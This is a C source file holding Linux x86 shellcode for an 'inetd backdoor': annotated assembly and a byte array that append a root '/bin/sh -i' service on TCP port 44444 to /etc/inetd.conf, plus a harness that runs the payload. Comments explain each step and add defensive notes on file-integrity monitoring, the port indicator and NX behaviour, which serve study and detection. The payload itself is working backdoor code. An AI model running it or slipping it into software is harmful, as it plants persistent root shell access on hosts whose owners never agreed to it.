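/*
 * Shellcode: Inetd Backdoor
 * Coded by hydroic
 * hydroic@yahoo.com
 * http://hydroic.tsx.org
 *
 * Target: Linux on 32-bit x86, system calls through int $0x80.
 *
 * What the payload does (read off the listing below):
 *   1. open("/etc/inetd.conf", O_RDWR | O_APPEND)        -- syscall 5
 *   2. write(fd, "\n44444 stream tcp nowait root /bin/sh sh -i", 43)
 *                                                        -- syscall 4
 *   3. exit(0)                                           -- syscall 1
 * The strings are built on the stack with push instructions, so the byte
 * sequence contains no NUL and strlen() reports its full length (111).
 * 44 bytes are pushed for the inetd entry but only 0x2b (43) are written,
 * so the trailing newline is not appended.
 *
 * The payload makes these three system calls and nothing else: it does not
 * signal or restart inetd, so the appended entry has no effect until inetd
 * next reads its configuration. The open() also needs write access to
 * /etc/inetd.conf, which on a normally configured host presumably means the
 * calling process is already root.
 *
 * Defensive notes:
 *   - File-integrity monitoring or an audit watch on /etc/inetd.conf catches
 *     the append; the file rarely changes outside package or admin activity.
 *   - Review inetd configuration for entries that run a shell (/bin/sh,
 *     "sh -i") as root, and for services that are not expected on the host.
 *   - A listener on TCP 44444 owned by inetd is the network-side indicator.
 *   - Hosts that do not need inetd are not exposed to this persistence path
 *     once the service is removed or disabled.
 *
 * asm code:
 *
 *   xor  %eax,%eax
 *   mov  $0x666e6fff,%ebx     ; "onf" preceded by a filler byte (0xff)
 *   shr  $0x8,%ebx            ; drop the filler -> "onf\0"
 *   push %ebx
 *   push $0x632e6474          ; "td.c"
 *   push $0x656e692f          ; "/ine"
 *   push $0x6374652f          ; "/etc"
 *   mov  %esp,%ebx            ; ebx -> "/etc/inetd.conf"
 *   mov  $0x402,%cx           ; O_RDWR | O_APPEND
 *   mov  $0x5,%al             ; open
 *   int  $0x80
 *   mov  %eax,%ebx            ; ebx = file descriptor
 *   push $0x0a692d20          ; " -i\n"
 *   push $0x68732068          ; "h sh"
 *   push $0x732f6e69          ; "in/s"
 *   push $0x622f2074          ; "t /b"
 *   push $0x6f6f7220          ; " roo"
 *   push $0x74696177          ; "wait"
 *   push $0x6f6e2070          ; "p no"
 *   push $0x6374206d          ; "m tc"
 *   push $0x61657274          ; "trea"
 *   push $0x73203434          ; "44 s"
 *   push $0x3434340a          ; "\n444"
 *   mov  %esp,%ecx            ; ecx -> start of the inetd entry
 *   xor  %edx,%edx
 *   mov  $0x2b,%dl            ; length = 43
 *   mov  $0x4,%al             ; write
 *   int  $0x80
 *   xor  %eax,%eax
 *   xor  %ebx,%ebx            ; exit status 0
 *   mov  $0x1,%al             ; exit
 *   int  $0x80
 */

/*
 * The header names on the original #include line did not survive extraction;
 * these two are the ones the code below needs (printf, strlen).
 */
#include <stdio.h>
#include <string.h>

/* Assembled form of the listing above, byte for byte. */
char intdbackd[]="\x31\xc0\xbb\xff\x6f\x6e\x66\xc1\xeb\x08\x53\x68"
                 "\x74\x64\x2e\x63\x68\x2f\x69\x6e\x65\x68\x2f\x65"
                 "\x74\x63\x89\xe3\x66\xb9\x02\x04\xb0\x05\xcd\x80"
                 "\x89\xc3\x68\x20\x2d\x69\x0a\x68\x68\x20\x73\x68"
                 "\x68\x69\x6e\x2f\x73\x68\x74\x20\x2f\x62\x68\x20"
                 "\x72\x6f\x6f\x68\x77\x61\x69\x74\x68\x70\x20\x6e"
                 "\x6f\x68\x6d\x20\x74\x63\x68\x74\x72\x65\x61\x68"
                 "\x34\x34\x20\x73\x68\x0a\x34\x34\x34\x89\xe1\x31"
                 "\xd2\xb2\x2b\xb0\x04\xcd\x80\x31\xc0\x31\xdb\xb0"
                 "\x01\xcd\x80";

/*
 * Test harness: prints the payload length, then transfers control to the
 * byte array. The payload ends in exit(0), so run() does not return when the
 * payload executes.
 *
 * The array lives in ordinary writable data. Where data pages are mapped
 * non-executable (NX / W^X), the indirect call is expected to fault instead
 * of running the payload.
 */
int main(void)
{
    long (*run)();

    /* strlen() returns size_t; the original "%d" mismatched the argument. */
    printf("Shellcode: %zu bytes.\n", strlen(intdbackd));

    /* Explicit cast: a char array does not convert to a function pointer
     * implicitly, and current compilers reject the bare assignment. */
    run = (long (*)())intdbackd;
    run();

    return 0;
}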